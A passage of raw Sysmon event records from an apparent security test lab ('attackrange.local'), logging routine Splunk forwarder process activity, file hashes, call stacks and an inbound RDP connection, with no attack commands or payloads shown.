Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.680{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=373480021CAF188AF7EA8C390A8FC1A2,SHA256=991BE16F7456F55926B09291D3C81061BA26B570B426F3CB2A4CAF62A4016C4E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.580{466BC892-F678-60EB-9C7D-00000000CF01}96888376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8480FC5710A52915CE4958543A975844,SHA256=EF22A93C63906348B8A466627936AB40F500DE8A0EEDC634B6C5684B41CB3ACF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808945Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:52.643{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6F9D6DCEA012CC6FCFACB1532CB67A3,SHA256=687AA5AD2DED46CA2C387C26B5A90A2BCCCC46F3BA7EE3ADC8213AA580C7E685,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.311{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F678-60EB-9C7D-00000000CF01}9688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.311{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.311{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.311{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.311{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.311{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F678-60EB-9C7D-00000000CF01}9688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.311{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F678-60EB-9C7D-00000000CF01}9688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.296{466BC892-F678-60EB-9C7D-00000000CF01}9688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.149{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D57914224154CE3647C0D7BB38C31B4A,SHA256=FC115FD537208E9A91C731051CDE316EF7ADFB89C8C312089D99E45097F36E77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.149{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=9C9B91DD607933377C2B0241470B94CF,SHA256=B6F690379A4CBB480F9985646E92C4D1415DCC951EFD414462B13503D08DF50C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808946Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:53.675{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C05C0C3A60D94B6BD4FB04D0A01A12F2,SHA256=6954F516159D7D9761B5684AB7B2A76514B258AA7167B677CA018A54397A61CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.981{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4509BFE796388C2A66B631DD1AADFD48,SHA256=DCF942F8D099A891822A9D2386556B0072A932D77BBF652C29B75C2F767F5201,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.895{466BC892-F679-60EB-9E7D-00000000CF01}95809056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.680{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F679-60EB-9E7D-00000000CF01}9580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.664{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.664{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.664{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.664{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.664{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F679-60EB-9E7D-00000000CF01}9580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.664{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F679-60EB-9E7D-00000000CF01}9580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.665{466BC892-F679-60EB-9E7D-00000000CF01}9580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1DCD0E76720DE2DB1F62E1990AF3EB4,SHA256=740329F8B7FF18BD018ED16194F198F83F5E2D68D842A70417C223657B532F91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808949Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:54.726{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1A510A9F05661317D86E3321D22BC97,SHA256=0B90AB6B9AF9783B07B67476E3BFB3707A306F02DFA7B05B9C4B11E54D83B72F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.534{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A638B8C7E4F12AB0763883CA66CEE62,SHA256=795AECCE905D085B56AE8BAF0B94CF5B3B7A3DDE19F47FAD06843FFB4A4661E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808948Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:53.118{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-45063-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x8000000000000000808947Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:52.369{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57362-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001051974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.365{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F67A-60EB-9F7D-00000000CF01}5260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.365{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F67A-60EB-9F7D-00000000CF01}5260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 